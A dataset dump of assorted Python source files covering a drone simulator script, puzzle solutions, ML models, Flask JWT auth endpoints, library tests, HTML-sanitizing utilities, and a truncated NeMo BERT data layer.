id
stringlengths 1
7
| text
stringlengths 6
1.03M
| dataset_id
stringclasses 1
value |
---|---|---|
3342123
|
# 准备运行示例:PythonClient / multirotor / hello_drone.py
import dronesim as airsim
import time
import numpy as np
from app.driver.cross import Cross
from app.vision.number import Number
import math
import cv2
t1 = time.time()
# 连接到AirSim模拟器
client = airsim.VehicleClient()
client.connection()
uav = airsim.VehicleMotion(client)
uav.start()
image = airsim.VehicleImage(client)
number = Number(image)
# 定位地面高度
takeoffHigh = client.getBarometerData().altitude
print('takeoffHigh =', round(takeoffHigh, 4))
cross = Cross(client, image, number, uav, takeoffHigh)
# 起飞
# client.takeoff()
uav.flyCmd('up', 'fast')
time.sleep(5)
uav.flyCmd('stop')
time.sleep(3)
# 定位初始方向
x0 = client.getMagnetometerData().magnetic_field_body.x_val
y0 = client.getMagnetometerData().magnetic_field_body.y_val
num = 1
# 1
cross.adjustPositionCentripetally()
cross.moveToCircle()
cross.adjustDrone()
cross.saveFrontSense(num)
num += 1
while(num <= 10):
cross.moveCircle_N()
cross.adjustDrone()
cross.saveFrontSense(num)
num += 1
t2 = time.time()
print('10-Circle complete time:', (t2-t1)/60, 'min')
|
StarcoderdataPython
|
3325701
|
<filename>day_21/solution.py
def name(f):
return f
def wrap(*a, **kw):
res = f(*a, **kw)
res.name = f.__qualname__ + "(" + ", ".join(map(repr, a)) + ")"
return res
return wrap
def ident(xs, **_):
return xs
@name
def rotate(steps, direction="right"):
if steps == 0:
return ident
d = 1 if direction == "left" else -1
def do(xs, *, reverse=False):
n = d * steps % len(xs)
if reverse:
n *= -1
return xs[n:] + xs[:n]
return do
@name
def rotate_char(c):
def do(xs, *, reverse=False):
i = xs.index(c)
if reverse:
x = xs[:]
for j in range(len(xs)):
x = rotate(1, "left")(x)
if rotate_char(c)(x[:]) == xs:
return x
return rotate(i + 1 + (i >= 4))(xs)
return do
@name
def reverse(a, b):
if a == b:
return ident
if b < a:
a, b = b, a
def do(xs, *, reverse=False):
return xs[:a] + xs[a:b+1][::-1] + xs[b+1:]
return do
@name
def move(a, b):
if a == b:
return ident
def do(xs, *, reverse=False):
if reverse:
xs.insert(a, xs.pop(b))
else:
xs.insert(b, xs.pop(a))
return xs
return do
@name
def swap(a, b):
if a == b:
return ident
def do(xs, *, reverse=False):
xs[a], xs[b] = xs[b], xs[a]
return xs
return do
@name
def swap_char(a, b):
if a == b:
return ident
def do(xs, *, reverse=False):
return swap(xs.index(a), xs.index(b))(xs)
return do
def parse(line):
parts = line.split()
if parts[0] == "swap":
_, t, x, _, _, y = parts
if t == "position":
return swap(int(x), int(y))
elif t == "letter":
return swap_char(x, y)
elif parts[0] == "move":
_, _, x, _, _, y = parts
return move(int(x), int(y))
elif parts[0] == "reverse":
_, _, x, _, y = parts
return reverse(int(x), int(y))
elif parts[0] == "rotate":
if parts[1] == "based":
return rotate_char(parts[-1])
else:
_, d, x, _ = parts
return rotate(int(x), d)
def part1(pw, ops):
for op in ops:
pw = op(pw)
return "".join(pw)
def part2(pw, ops):
for op in reversed(ops):
pw = op(pw, reverse=True)
return "".join(pw)
def main(inputs):
print("Day 21")
ops = list(map(parse, inputs))
A = part1(list("abcdefgh"), ops)
print(f"{A=}")
B = part2(list("fbgdceah"), ops)
print(f"{B=}")
|
StarcoderdataPython
|
3203967
|
<reponame>YiqunPeng/leetcode_pro
class Solution:
def maxNumberOfFamilies(self, n: int, reservedSeats: List[List[int]]) -> int:
"""Hash table.
Running time: O(r) where r == len(reservedSeats).
"""
rd = {}
for i, j in reservedSeats:
if 2 <= j <= 9:
if i not in rd:
rd[i] = [0, 0, 0, 0]
rd[i][(j - 2)//2] = 1
res = 2 * n
for k, v in rd.items():
if sum(v) == 1:
res -= 1
elif sum(v) == 2:
if v == [1, 0, 0, 1] or v == [1, 1, 0, 0] or v == [0, 0, 1, 1]:
res -= 1
else:
res -= 2
else:
res -= 2
return res
|
StarcoderdataPython
|
3326654
|
<filename>my-loop-ex1.py
#!/usr/bin/env python
b_list = range(1, 50)
for i in b_list:
if i == 13:
continue
print i
if i == 39:
break
|
StarcoderdataPython
|
3250944
|
<filename>common/nets/net_disc.py
# © 2021 Nokia
#
# Licensed under the BSD 3 Clause license
# SPDX-License-Identifier: BSD-3-Clause
import sys
sys.path.append('../common')
from defaults import *
import utils
import torch
# ==============================================================================
# Settings =====================================================================
n_conv_1 = 64
n_conv_2 = 16
# ==============================================================================
# Module definitions ===========================================================
class NetDiscConvTrans(utils.DmModule):
def __init__(self, w_in, w_out, bn = True, sigm = True):
super().__init__()
self.w_out = w_out
self.bn = bn
self.sigm = sigm
# Encoder
self.enc_conv_1 = torch.nn.ConvTranspose1d(w_in, n_conv_1, 3, stride = 1, padding = 1)
self.enc_nonl_1 = torch.nn.LeakyReLU()
self.enc_samp_12 = torch.nn.Upsample(scale_factor = 4)
self.enc_conv_2 = torch.nn.ConvTranspose1d(n_conv_1, n_conv_2, 3, stride = 1, padding = 1)
self.enc_norm_2 = torch.nn.BatchNorm1d(n_conv_2)
self.enc_nonl_2 = torch.nn.LeakyReLU()
# Decoder
self.dec_conv_2 = torch.nn.Conv1d(n_conv_2, n_conv_1, 3, stride = 1, padding = 1)
self.dec_norm_2 = torch.nn.BatchNorm1d(n_conv_1)
self.dec_nonl_2 = torch.nn.LeakyReLU()
self.dec_pool_21 = torch.nn.AvgPool1d(2, stride = 4)
self.dec_conv_1 = torch.nn.Conv1d(n_conv_1, self.w_out, 3, stride = 1, padding = 1)
self.dec_nonl_1 = torch.nn.Sigmoid()
self.resetParams()
def resetParams(self):
for m in self.modules():
if isinstance(m, torch.nn.Conv1d) or isinstance(m, torch.nn.ConvTranspose1d):
torch.nn.init.xavier_normal_(m.weight)
torch.nn.init.zeros_(m.bias)
elif isinstance(m, torch.nn.BatchNorm1d):
torch.nn.init.ones_(m.weight)
torch.nn.init.zeros_(m.bias)
def encode(self, x):
x = self.enc_conv_1(x)
x = self.enc_nonl_1(x)
x = self.enc_samp_12(x)
x = self.enc_conv_2(x)
x = self.enc_norm_2(x) if self.bn else x
x = self.enc_nonl_2(x)
return(x)
def decode(self, x):
x = self.dec_conv_2(x)
x = self.dec_norm_2(x) if self.bn else x
x = self.dec_nonl_2(x)
x = self.dec_pool_21(x)
x = self.dec_conv_1(x)
x = self.dec_nonl_1(x) if self.sigm else x
return(x)
def forward(self, x):
enc = self.encode(x)
dec = self.decode(enc)
return(dec)
|
StarcoderdataPython
|
153211
|
# from preprocess import *
import keras
from keras.models import Sequential
from keras.layers import Dense, Dropout, Flatten, Conv2D, MaxPooling2D
from keras.utils import to_categorical
from keras.models import load_model
from preprocess_spectrogram import *
import os
os.environ["PATH"] += os.pathsep + 'C:/Program Files (x86)/Graphviz2.38/bin/'
# Preprocess data and save data to array file first
save_data_to_array()
# # Loading train set and test set
X_train, X_test, y_train, y_test = get_train_test()
#Shape of audio vectors
print(X_train.shape)
# Feature dimension
# Freq
img_dim = 28
channel = 1
epochs = 100
batch_size = 100
verbose = 1
num_classes = 8
# # Reshaping to perform 2D convolution
X_train = X_train.reshape(X_train.shape[0], img_dim, img_dim, channel)
X_test = X_test.reshape(X_test.shape[0], img_dim, img_dim, channel)
print(X_train.shape)
y_train_hot = to_categorical(y_train)
y_test_hot = to_categorical(y_test)
def get_model():
model = Sequential()
model.add(Conv2D(32, kernel_size=(2, 2), activation='relu', input_shape=(img_dim, img_dim, channel)))
model.add(Conv2D(64, kernel_size=(2, 2), activation='relu'))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Dropout(0.3))
model.add(Flatten())
model.add(Dense(128, activation='relu'))
model.add(Dropout(0.3))
model.add(Dense(64, activation='relu'))
model.add(Dropout(0.4))
model.add(Dense(num_classes, activation='softmax'))
model.compile(loss='categorical_crossentropy',
optimizer=keras.optimizers.Adadelta(),
metrics=['accuracy'])
return model
# Predicts one sample
def predict(filepath, model):
sample = spectrogram(filepath)
sample_reshaped = sample.reshape(1, img_dim, img_dim, channel)
return get_labels()[0][
np.argmax(model.predict(sample_reshaped))
]
model = get_model()
# model.summary()
model.fit(X_train, y_train_hot, batch_size=batch_size, epochs=epochs, verbose=verbose, validation_data=(X_test, y_test_hot))
# model.save('models/spectrogram2.h5')
# Save model plot
# from keras.utils.vis_utils import plot_model
# plot_model(model, to_file='model_plot2.png', show_shapes=True, show_layer_names=True)
print(predict('test/down.wav', model=model))
|
StarcoderdataPython
|
130120
|
"""Module containing the authentication API of the v1 API."""
from typing import Dict
from flask.helpers import url_for
from flask.views import MethodView
from dataclasses import dataclass
from flask_jwt_extended import (
create_access_token,
create_refresh_token,
current_user,
)
from .root import API_V1
from ..base_models import ApiLink, ApiResponse, DynamicApiResponseSchema
from .models import (
LoginPostSchema,
LoginTokensSchema,
AccessTokenSchema,
UserSchema,
)
from ..jwt import DemoUser
@dataclass
class AuthRootData:
self: ApiLink
@dataclass
class LoginTokensData:
self: ApiLink
access_token: str
refresh_token: str
@dataclass
class RefreshedTokenData:
self: ApiLink
access_token: str
@API_V1.route("/auth/")
class AuthRootView(MethodView):
"""Root endpoint for all authentication resources."""
@API_V1.response(DynamicApiResponseSchema())
def get(self):
"""Get the urls for the authentication api."""
return ApiResponse(
links=[
ApiLink(
href=url_for("api-v1.LoginView", _external=True),
rel=("login", "post"),
resource_type="login",
),
ApiLink(
href=url_for("api-v1.RefreshView", _external=True),
rel=("refresh", "post"),
resource_type="refresh",
),
ApiLink(
href=url_for("api-v1.WhoamiView", _external=True),
rel=("whoami", "user"),
resource_type="user",
),
],
data=AuthRootData(
self=ApiLink(
href=url_for("api-v1.AuthRootView", _external=True),
rel=("api", "authentication"),
resource_type="api",
)
),
)
@API_V1.route("/auth/login/")
class LoginView(MethodView):
"""Login endpoint to retrieve api tokens."""
@API_V1.arguments(
LoginPostSchema(),
location="json",
description="The login credentials of the user.",
)
@API_V1.response(DynamicApiResponseSchema(data_schema=LoginTokensSchema()))
def post(self, credentials: Dict[str, str]):
"""Login with the user credentials to receive a access and refresh token pair.
The access token can be used for all authorized api endpoints.
The refresh token can only be used with the refresh endpoint to get a new access token.
"""
identity = DemoUser(credentials.get("username", "guest"))
return ApiResponse(
links=[
ApiLink(
href=url_for("api-v1.RefreshView", _external=True),
rel=("refresh", "post"),
resource_type="refresh",
),
ApiLink(
href=url_for("api-v1.WhoamiView", _external=True),
rel=("whoami", "user"),
resource_type="user",
),
],
data=LoginTokensData(
self=ApiLink(
href=url_for("api-v1.LoginView", _external=True),
rel=("login", "post"),
resource_type="login",
),
access_token=create_access_token(identity=identity),
refresh_token=create_refresh_token(identity=identity),
),
)
@API_V1.route("/auth/refresh/")
class RefreshView(MethodView):
"""Refresh endpoint to retrieve new api access tokens."""
@API_V1.response(DynamicApiResponseSchema(AccessTokenSchema()))
@API_V1.require_jwt("jwt-refresh-token", refresh_token=True)
def post(self, credentials: Dict[str, str]):
"""Get a new access token.
This method requires the jwt refresh token!
"""
identity = current_user
return ApiResponse(
links=[
ApiLink(
href=url_for("api-v1.WhoamiView", _external=True),
rel=("whoami", "user"),
resource_type="user",
),
],
data=RefreshedTokenData(
self=ApiLink(
href=url_for("api-v1.RefreshView", _external=True),
rel=("refresh", "post"),
resource_type="refresh",
),
access_token=create_access_token(identity=identity, fresh=True),
),
)
@API_V1.route("/auth/whoami/")
class WhoamiView(MethodView):
"""Whoami endpoint to test the api token and get the current user info."""
@API_V1.response(DynamicApiResponseSchema(UserSchema()))
@API_V1.require_jwt("jwt")
def get(self):
"""Get the user object of the current user."""
return current_user
|
StarcoderdataPython
|
3327095
|
<reponame>dreinq/DeepQ
import multiprocessing as mp
from logging import Logger
from typing import Tuple
import torch
from torch import nn
from torch.utils.data import DataLoader
from tqdm import tqdm
from MCQ.datasets import SiftLike, Enumerate
from MCQ.envs import Env
from MCQ.utils import Saver
from MCQ.utils.runtime import Timer
from MCQ.metrics import QuantizationError, Reconstruct
from MCQ import Consts
class Eval:
def __init__(self, evalOther: bool, savePath: str, dataset: SiftLike, env: Env, model: nn.Module, logger: Logger = None):
if not evalOther:
self._model = model.cuda()
self._env = env
Saver.Load(savePath, model=self._model)
self._model.eval()
self._dataset = dataset
else:
pass
torch.autograd.set_grad_enabled(False)
self._obsMean = None
self._obsStd = None
self._logger = logger or Consts.Logger
def Encode(self, dataset, icm = False, C = None):
dataloader = DataLoader(dataset, batch_size=100000, shuffle=False, num_workers=mp.cpu_count())
B = list()
ticker = Timer()
for x in tqdm(dataloader, ncols=40, bar_format="{l_bar}{bar}| {n_fmt}/{total_fmt}"):
x = x.cuda()
if self._env.DoNormalizationOnObs:
newX = (x - self._obsMean) / self._obsStd
b = self._model.Encode(newX, icm=True, C=C, shift=self._obsMean, scale=self._obsStd)
B.append(b.detach().cpu())
interval, _ = ticker.Tick()
self._logger.info("Encode %d samples for %.2f seconds, %.2e s/sample, %.2e samples/s", len(dataset), interval, interval / len(dataset), len(dataset) / interval)
B = torch.cat(B, 0)
return B
def EncodeFast(self, dataset, icm=True, C = None):
dataloader = DataLoader(dataset, batch_size=100000, shuffle=False, num_workers=mp.cpu_count())
B = list()
icmC = C.reshape(-1, C.shape[-1])
cUnary = (icmC ** 2).sum(-1)
cPair = 2 * (icmC @ icmC.t())
ticker = Timer()
for x in tqdm(dataloader, ncols=40, bar_format="{l_bar}{bar}| {n_fmt}/{total_fmt}"):
x = x.cuda()
if self._env.DoNormalizationOnObs:
newX = (x - self._obsMean) / self._obsStd
b = self._model.EncodeFast(newX, icm=True, realX=x, C=icmC, cUnary=cUnary, cPair=cPair)
B.append(b.detach().cpu())
interval, _ = ticker.Tick()
self._logger.info("Encode %d samples for %.2f seconds, %.2e s/sample, %.2e samples/s", len(dataset), interval, interval / len(dataset), len(dataset) / interval)
B = torch.cat(B, 0)
return B
def GetCodebook(self, X, icm=False):
if self._env.DoNormalizationOnObs:
newX = X - self._obsMean.to(X.device)
newX /= self._obsStd.to(X.device)
B = self._model.Encode(newX)
C, qError = self._env.Eval(X, B)
if not icm:
return C
B = self._model.Encode(newX, icm=True, C=C, shift=self._obsMean, scale=self._obsStd)
newC, newQError = self._env.Eval(X, B)
if newQError.mean() > qError.mean():
return C
return newC
@staticmethod
def Retrieval(queries, C, B):
M, _, _ = C.shape
# if M == 1:
# return Eval._retrievalVQ(queryLoader, C, B)
topK: Tuple[torch.Tensor, torch.Tensor] = None
N = len(queries)
ix = torch.arange(len(queries))[:, None]
baseLoader = DataLoader(Enumerate(B), batch_size=1000, shuffle=False, num_workers=0)
for i, b in tqdm(baseLoader, ncols=40, bar_format="{l_bar}{bar}| {n_fmt}/{total_fmt}"):
quantized = Reconstruct(C, b)
# [N, 100]
dist = ((queries[:, None, ...] - quantized) ** 2).sum(-1)
i = i.to(b.device).expand_as(dist)
if topK is not None:
# [N, 200]
preparedI = torch.cat([i, topK[0]], -1)
# [N, 200]
preparedD = torch.cat([dist, topK[1]], -1)
else:
preparedI = i
preparedD = dist
# _, [N, 100]
_, iy = torch.topk(preparedD, k=100, dim=-1, largest=False, sorted=True)
topK = (preparedI[ix.expand_as(iy), iy], preparedD[ix.expand_as(iy), iy])
return topK[0]
# # [NB, D]
# quantized = Reconstruct(C, B)
# results = []
# for q in tqdm(queryLoader, ncols=40, bar_format="{l_bar}{bar}| {n_fmt}/{total_fmt}"):
# q = q.cuda()
# # [NQ, NB]
# dist = ((q[:, None, ...] - quantized) ** 2).sum(-1)
# _, indices = torch.topk(dist, k=100, dim=-1, largest=False, sorted=True)
# results.append(indices.detach())
# return torch.cat(results, 0)
@staticmethod
def RetrievalSlow(queries, C, B):
M, _, _ = C.shape
queryLoader = DataLoader(queries, batch_size=1, num_workers=0, shuffle=False)
if M == 1:
return Eval._retrievalVQ(queryLoader, C, B)
# [NB, D]
quantized = Reconstruct(C, B)
results = []
for q in tqdm(queryLoader, ncols=40, bar_format="{l_bar}{bar}| {n_fmt}/{total_fmt}"):
q = q.cuda()
# [NQ, NB]
dist = ((q[:, None, ...] - quantized) ** 2).sum(-1)
_, indices = torch.topk(dist, k=100, dim=-1, largest=False, sorted=True)
results.append(indices.detach())
return torch.cat(results, 0)
@staticmethod
def _retrievalVQ(queryLoader, C, B):
# [NB, 1] -> [NB]
B = B.squeeze()
results = []
slot = B.shape[0] // C.shape[1]
for q in tqdm(queryLoader, ncols=40, bar_format="{l_bar}{bar}| {n_fmt}/{total_fmt}"):
q = q.cuda()
# [N, K] <- [N, 1, D], [1, K, D]
dist = ((q[:, None, ...] - C) ** 2).sum(-1)
# [N, NB]
allDist = dist[:, B]
# [N, slot]
_, indices = torch.topk(allDist, k=slot, dim=-1, largest=False, sorted=True)
results.append(indices.detach())
# [NQ, 100]
return torch.cat(results, 0)
@staticmethod
def Recall(results, groundtruths):
# [N, 100] = [N, 100] == [N, 1]
isin = results == groundtruths
recalls = []
for i in range(1, isin.shape[-1] + 1):
recalls.append(isin[:, :i].any(-1).float().mean())
return torch.Tensor(recalls)
def Test(self, C=None, B=None):
sift = self._dataset
if self._env.DoNormalizationOnObs:
self._obsMean = sift.data.mean(0).cuda()
self._obsStd = sift.data.std(0).cuda()
if C is None:
sift.Train()
C = self.GetCodebook(sift.data, icm=True).cuda()
if B is None:
sift.Encode(device="cpu")
B = self.Encode(sift, icm=True, C=C)
self._logger.info("Quantization error in base: %.8e", QuantizationError(sift.data.cuda(), C.cuda(), B.cuda()).mean())
sift.Query(device="cuda")
# queryLoader = DataLoader(sift, batch_size=1, shuffle=False, num_workers=mp.cpu_count())
results = self.Retrieval(sift.data, C.cuda(), B.cuda())
sift.Gt(device="cuda")
recalls = self.Recall(results, sift.data[:, :1]) * 100
self._logger.info("R @ 1: %.2f%%", recalls[0])
self._logger.info("R @ 10: %.2f%%", recalls[9])
self._logger.info("R @ 100: %.2f%%", recalls[99])
|
StarcoderdataPython
|
1695877
|
<reponame>Lucino772/pymojang<gh_stars>1-10
import unittest
import mojang
from mojang.account.structures.base import (
NameInfoList,
UUIDInfo,
NameInfo,
)
from mojang.account.structures.profile import UnauthenticatedProfile
from mojang.account.structures.session import Cape, Skin
class TestMojangAPI(unittest.TestCase):
def test_existent_uuid(self):
self.assertEqual(
mojang.get_uuid("Notch").uuid, "069a79f444e94726a5befca90e38aaf5"
)
self.assertEqual(
mojang.get_uuid("jeb_").uuid, "853c80ef3c3749fdaa49938b674adae6"
)
def test_unexistent_uuid(self):
self.assertEqual(mojang.get_uuid("UNEXISTENT_PLAYER"), None)
def test_existent_uuids(self):
self.assertEqual(
mojang.get_uuids(["Notch", "jeb_"]),
[
UUIDInfo("Notch", "069a79f444e94726a5befca90e38aaf5"),
UUIDInfo("jeb_", "853c80ef3c3749fdaa49938b674adae6"),
],
)
self.assertEqual(
mojang.get_uuids(["jeb_", "Notch"]),
[
UUIDInfo("jeb_", "853c80ef3c3749fdaa49938b674adae6"),
UUIDInfo("Notch", "069a79f444e94726a5befca90e38aaf5"),
],
)
def test_unexistent_uuids(self):
self.assertEqual(
mojang.get_uuids(["jeb_", "UNEXISTENT_PLAYER"]),
[UUIDInfo("jeb_", "853c80ef3c3749fdaa49938b674adae6"), None],
)
self.assertEqual(
mojang.get_uuids(["UNEXISTENT_PLAYER1", "UNEXISTENT_PLAYER2"]),
[None, None],
)
def test_existent_names(self):
self.assertEqual(
mojang.names("069a79f444e94726a5befca90e38aaf5"),
NameInfoList([NameInfo("Notch", None)]),
)
self.assertEqual(
mojang.names("853c80ef3c3749fdaa49938b674adae6"),
NameInfoList([NameInfo("jeb_", None)]),
)
def test_unexistent_names(self):
self.assertEqual(
mojang.names("069a79f444e94726a5befca90e38aaf6"), NameInfoList([])
)
def test_existent_profile(self):
self.assertEqual(
mojang.user("069a79f444e94726a5befca90e38aaf5"),
UnauthenticatedProfile(
"Notch",
"069a79f444e94726a5befca90e38aaf5",
False,
False,
NameInfoList([NameInfo("Notch", None)]),
Skin(
"http://textures.minecraft.net/texture/292009a4925b58f02c77dadc3ecef07ea4c7472f64e0fdc32ce5522489362680",
"classic",
),
None,
),
)
self.assertEqual(
mojang.user("853c80ef3c3749fdaa49938b674adae6"),
UnauthenticatedProfile(
"jeb_",
"853c80ef3c3749fdaa49938b674adae6",
False,
False,
NameInfoList([NameInfo("jeb_", None)]),
Skin(
"http://textures.minecraft.net/texture/7fd9ba42a7c81eeea22f1524271ae85a8e045ce0af5a6ae16c6406ae917e68b5",
"classic",
),
Cape(
"http://textures.minecraft.net/texture/9e507afc56359978a3eb3e32367042b853cddd0995d17d0da995662913fb00f7"
),
),
)
def test_unexistent_profile(self):
self.assertEqual(mojang.user("0<PASSWORD>"), None)
|
StarcoderdataPython
|
1708000
|
import importlib
import pytest
class TestSSLFailure(object):
@pytest.mark.run(order=-1)
def test_ssl_failure(self, monkeypatch):
import ssl
monkeypatch.delattr(ssl, "PROTOCOL_TLSv1", raising=True)
import stomp.transport as t
importlib.reload(t)
assert t.DEFAULT_SSL_VERSION is None
monkeypatch.undo()
importlib.reload(ssl)
@pytest.mark.run(order=-1)
def test_socket_failure(self, monkeypatch):
import socket
monkeypatch.delattr(socket, "SO_KEEPALIVE", raising=True)
import stomp.transport as t
importlib.reload(t)
assert not t.LINUX_KEEPALIVE_AVAIL
monkeypatch.undo()
importlib.reload(socket)
|
StarcoderdataPython
|
3361872
|
import random
from jogador import Jogador
class Aleatorio(Jogador):
def __init__(self, nome):
return super().__init__(nome)
def deveComprar(self, propriedade):
return self.temSaldoPositivo() and self.temProbabilidade()
def temProbabilidade(self):
return random.randint(0, 2) > 1
|
StarcoderdataPython
|
179920
|
import pandas as pd
import inspect
import unittest
import numpy as np
'''
The general.unique take a array-like object and return the unique values in it. To test this we simply pass in different lists where some
of the values are not unique, and check if general.unique returns the right values.
From documentation:
Parameters: values1d: array-like
Returns:
numpy.ndarray or ExtensionArray
The return can be:
Index : when the input is an Index
Categorical : when the input is a Categorical dtype
ndarray : when the input is a Series/ndarray
Return numpy.ndarray or ExtensionArray.
'''
def all_true(arr):
'''Returns True if all items in array is True.
Otherwise return False'''
state = True
for item in arr:
if item == False:
return False
return True
class TestUnique(unittest.TestCase):
'''Functions for testing the unique in pandas general functions'''
def setUp(self):
self.sequence1 = [1, 2, 3]
self.sequence2 = [1, 2, 3, 3]
self.sequence3 = []
self.sequence4 = [0]*1000000 + [1]
def test_unique_blackbox(self):
#basic uniqueness test given documentation
sequence1_unique = pd.unique(self.sequence1)
# unique list, should stay the same
self.assertTrue(all_true(sequence1_unique == [1, 2, 3]))
sequence2_unique = pd.unique(self.sequence2)
# not unique list, should become unique
self.assertTrue(all_true(sequence2_unique == [1, 2, 3]))
sequence3_unique = pd.unique(self.sequence3)
# empty list, should stay empty
self.assertTrue(all_true(sequence3_unique == []))
# bigger list with alot of 0 and one 1. Should become just the 0 and the 1.
sequence3_unique = pd.unique(self.sequence4)
self.assertTrue(all_true(sequence3_unique == [0,1]))
if __name__ == '__main__':
unittest.main()
|
StarcoderdataPython
|
1659911
|
import typing
import bleach
# import markdown2
from nasse import config, logging
# Source: en.wikipedia.org/wiki/Whitespace_character
# Note: BRAILLE PATTERN BLANK, HANGUL FILLER, <NAME>, <NAME>LER and HALFWIDTH HANGUL FILLER are also refered here as "whitespaces" while they aren't according to the Unicode standard.
WHITESPACES = ["\u0009", "\u000A", "\u000B", "\u000C", "\u000D", "\u0020", "\u0085", "\u00A0", "\u1680", "\u2000", "\u2001", "\u2002", "\u2003", "\u2004", "\u2005", "\u2006", "\u2007", "\u2008", "\u2009", "\u200A", "\u2028", "\u2029", "\u202F", "\u205F", "\u3000", "\u180E", "\u200B",
"\u200C", "\u200D", "\u2060", "\uFEFF", "\u00B7", "\u21A1", "\u2261", "\u237D", "\u23CE", "\u2409", "\u240A", "\u240B", "\u240C", "\u240D", "\u2420", "\u2422", "\u2423", "\u2424", "\u25B3", "\u2A5B", "\u2AAA", "\u2AAB", "\u3037", "\u2800", "\u3164", "\u115F", "\u1160", "\uFFA0"]
# Markdown Parsing
EXTRAS = ["code-friendly", "cuddled-lists", "fenced-code-blocks", "footnotes",
"nofollow", "spoiler", "strike", "target-blank-links", "tables", "task_list"]
ALLOWED_TAGS = ['h1', 'h2', 'h3', 'h4', 'h5', 'h6', 'h7', 'h8', 'br', 'b', 'i', 'strong', 'em', 'a', 'pre', 'code', 'img', 'tt', 'div', 'ins', 'del', 'sup', 'sub', 'p', 'ol', 'ul', 'table', 'thead', 'tbody', 'tfoot', 'blockquote', 'dl',
'dt', 'dd', 'kbd', 'q', 'samp', 'var', 'hr', 'ruby', 'rt', 'rp', 'li', 'tr', 'td', 'th', 's', 'strike', 'summary', 'details', 'caption', 'figure', 'figcaption', 'abbr', 'bdo', 'cite', 'dfn', 'mark', 'small', 'span', 'time', 'wbr']
ALLOWED_ATTRS = {
"*": ['abbr', 'accept', 'accept-charsetaccesskey', 'action', 'align', 'altaria-describedby', 'aria-hidden', 'aria-label', 'aria-labelledbyaxis', 'border', 'cellpadding', 'cellspacing', 'charcharoff', 'charset', 'checkedclear', 'cols', 'colspan', 'colorcompact', 'coords', 'datetime', 'dirdisabled', 'enctype', 'for', 'frameheaders', 'height', 'hreflanghspace', 'ismap', 'label', 'langmaxlength', 'media', 'methodmultiple', 'name', 'nohref', 'noshadenowrap', 'open', 'progress', 'prompt', 'readonly', 'rel', 'revrole', 'rows', 'rowspan', 'rules', 'scopeselected', 'shape', 'size', 'spanstart', 'summary', 'tabindex', 'targettitle', 'type', 'usemap', 'valign', 'valuevspace', 'width', 'itemprop'],
"a": ['href'],
"img": ['src', 'longdesc'],
"div": ['itemscope', 'itemtype'],
"blockquote": ['cite'],
"del": ['cite'],
"ins": ['cite'],
"q": ['cite']
}
ALLOWED_PROTO = ['http', 'https', 'mailto']
def remove_spaces(string: str):
"""Removes all whitespaces from the given string"""
if string is None:
return ""
return "".join(l for l in str(string) if l not in WHITESPACES)
def alphabetic(string: str, decimals: bool = True):
"""Removes all of the non alphabetical letters from the string"""
if string is None:
return ""
if decimals:
return "".join(l for l in str(string) if l.isalpha() or l.isdecimal())
return "".join(l for l in str(string) if l.isalpha())
def sanitize_http_method(method: str):
"""Sanitizes the given HTTP method to normalize it"""
method = remove_spaces(method).upper()
if method not in config.Enums.Conventions.HTTP_METHODS and method != "*":
logging.log(
message="The provided HTTP method {method} does not seem to be in the set of defined HTTP methods".format(
method=method),
level=logging.LogLevels.WARNING)
return method
def sort_http_methods(methods: typing.Iterable):
"""Sorts the given HTTP methods to normalize them"""
methods = {sanitize_http_method(method) for method in methods}
results = []
for method in ["GET", "POST", "PUT", "DELETE", "PATCH", "HEAD", "OPTIONS"]: # ordered
if method in methods:
results.append(method)
methods.discard(method)
results.extend(methods) # remaining methods
return results
# def markdown_to_html(md: str, table_of_content=False):
# """Markdown to HTML with Sanitizing and Link Recognition"""
# html = markdown2.markdown(str(md), extras=EXTRAS +
# (["toc"] if table_of_content else []))
# cleaner = bleach.Cleaner(tags=ALLOWED_TAGS, attributes=ALLOWED_ATTRS,
# protocols=ALLOWED_PROTO, filters=[bleach.linkifier.LinkifyFilter])
# return cleaner.clean(str(html))
def sanitize_text(text: str, strict=True):
"""Sanitize text by removing any forbidden HTML part snippet"""
if strict:
return bleach.clean(str(text), tags=["b", "i", "em", "strong"], attributes=[], protocols=[])
return bleach.clean(str(text), tags=ALLOWED_TAGS, attributes=ALLOWED_ATTRS, protocols=ALLOWED_PROTO)
def split_on_uppercase(string: str):
"""
Splits a string on any uppercase letter
Parameters
-----------
string: str
The string to split
Returns
-------
list
The string splitted
"""
start = 0
results = []
string = str(string)
length = len(string)
for index, letter in enumerate(string):
if letter.isupper() and (string[index - 1].islower() or (length > index + 1 and string[index + 1].islower())):
results.append(string[start:index])
start = index
results.append(string[start:])
return results
DELIMITER = "🈑"
def to_path(name: str) -> str:
"""
Converts a method name to a path
Parameters
----------
name: str
The name of the method/class/object
"""
name = str(name)
# hello__username__ --> hello/<username>
in_variable = False
result = ""
name_length = len(name)
for index, letter in enumerate(name):
if letter == "_":
if in_variable: # <hello_world>
# the previous _ got replaced by >, so we don't need to convert it too
if result[-1] == ">":
result += "_"
continue
# the previous _ got replaced by <, so we don't need to convert it too
elif result[-1] == "<":
continue
# "__" --> ">"
elif index + 1 < name_length and name[index + 1] == "_":
in_variable = False
result += ">"
else:
result += DELIMITER # we want to keep any "_" inside a variable name
continue
else:
# "__" --> "<"
if index + 1 < name_length and name[index + 1] == "_":
in_variable = True
result += "_<"
else: # a regular _, to be converted into "/"
result += letter
continue
else:
result += letter
name = result
# nasse.utils.sanitize --> nasse/utils/sanitize
name = "/".join(str(name).split("."))
# hello_world --> hello/world
name = "/".join(name.split("_"))
# helloWorld --> hello-world
name = "-".join(split_on_uppercase(name)).lower()
return "/" + name.replace(DELIMITER, "_").replace("//", "/").strip("/")
def toCamelCase(string: str):
"""
Converts a string to camel case
Parameters
----------
string: str
The string to convert
"""
string = str(string)
if string.isupper():
return string
split = string.split("_") # split by underscore
final_split = []
for s in split:
final_split.extend(s.split(" ")) # split by space
return "".join(l.capitalize() if index > 0 else l for index, l in enumerate(final_split))
|
StarcoderdataPython
|
3208493
|
<reponame>harisankarh/NeMo
# Copyright (c) 2019 NVIDIA Corporation
from nemo.backends.pytorch.nm import DataLayerNM
from nemo.core.neural_types import *
from nemo.core import DeviceType
import torch
from .datasets import BertPretrainingDataset
class BertPretrainingDataLayer(DataLayerNM):
@staticmethod
def create_ports():
input_ports = {}
output_ports = {
"input_ids":
NeuralType({
0: AxisType(BatchTag),
1: AxisType(TimeTag)
}),
"input_type_ids":
NeuralType({
0: AxisType(BatchTag),
1: AxisType(TimeTag)
}),
"input_mask":
NeuralType({
0: AxisType(BatchTag),
1: AxisType(TimeTag)
}),
"output_ids":
NeuralType({
